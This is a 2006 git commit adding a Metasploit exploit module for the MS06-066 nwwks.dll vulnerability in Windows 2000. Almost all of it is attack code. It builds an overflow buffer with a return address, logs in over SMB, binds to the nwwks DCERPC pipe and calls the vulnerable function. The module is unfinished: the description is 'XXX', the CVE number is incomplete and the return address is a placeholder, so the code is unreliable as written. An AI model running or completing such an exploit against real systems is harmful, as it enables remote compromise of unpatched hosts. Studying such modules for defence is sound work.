Trying to add this again...

git-svn-id: file:///home/svn/framework3/trunk@4140 4d416f70-5f16-0410-b530-b9f4589650da
2006-11-15 19:04:37 +00:00 · 2006-11-15 19:04:37 +00:00 · 2ce2ff8a3a
parent 3c8315d2ad
commit 2ce2ff8a3a
1 changed files with 122 additions and 0 deletions
--- a/modules/exploits/windows/smb/ms06_066_nwwks.rb
+++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb
@ -0,0 +1,122 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Smb::MS06_066_NWWKS < Msf::Exploit::Remote
+
+	include Exploit::Remote::DCERPC
+	include Exploit::Remote::SMB
+	
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Microsoft Services MS06-066 nwwks.dll',
+			'Description'    => %q{
+				XXX	
+			},
+			'Author'         => [ 'pusscat' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 1 $',
+			'References'     =>
+				[
+					[ 'CVE', '2006-'],
+					[ 'MSB', 'MS06-066'],
+
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'Space'    => 1000,
+					'BadChars' => "",
+					'Compat'   => 
+					{
+						# -ws2ord XXX?
+					},
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        => 
+				[
+					[ 
+						'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm
+						{
+							'Ret'      => 0x0BADB0D0, # umpnpmgr.dll
+						},
+					]
+				],
+
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Nov 14 2006'))
+			
+		register_options(
+			[
+				OptString.new('SMBPIPE', [ true,  "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'nwwks']),
+			], self.class)
+						
+	end
+
+	def exploit
+		# [in] [unique] wchar *
+		# [in] [unique] wchar *
+		# [out] long
+		
+		ofstring    = Rex::Text.to_unicode('\\\\') + "A"*292 + [ target.ret ].pack('V') + "\x00\x00" 
+	    stubdata = 
+						NDR.long(rand(0xffffffff)) +
+                        NDR.UnicodeConformantVaryingString("AAAA" + "\x00") +
+						NDR.long(rand(0xffffffff)) +
+                        NDR.UnicodeConformantVaryingString("BBBB" + "\x00") +
+						NDR.long(rand(0xffffffff)) +
+                        NDR.UnicodeConformantVaryingString("CCCC" + "\x00") +
+						NDR.long(rand(0xffffffff)) +
+                        NDR.UnicodeConformantVaryingString("DDDD" + "\x00") +
+                        NDR.UnicodeConformantVaryingStringPreBuilt(ofstring)
+						
+						
+
+                        
+                        
+		print_status("Connecting to the SMB service...")
+		connect()
+		smb_login()
+
+		handle = dcerpc_handle('e67ab081-9844-3521-9d32-834f038001c0', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
+		print_status("Binding to #{handle} ...")
+		dcerpc_bind(handle)
+		print_status("Bound to #{handle} ...")
+
+		print_status("Calling the vulnerable function...")
+		
+		begin
+			dcerpc.call(0x01, stubdata)
+		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
+			print_good('Server did not respond, this is expected')
+		rescue => e
+			if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
+				print_good('Server disconnected, this is expected')
+			else
+				raise e
+			end
+		else 
+			print_status("Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}")
+		end
+
+		# Cleanup
+		handler
+		disconnect	
+	
+		if (dcerpc.last_response != nil and 
+			dcerpc.last_response.stub_data != nil and 
+			dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
+			return true
+		else 
+			return false
+		end
+	end
+	
+end
+end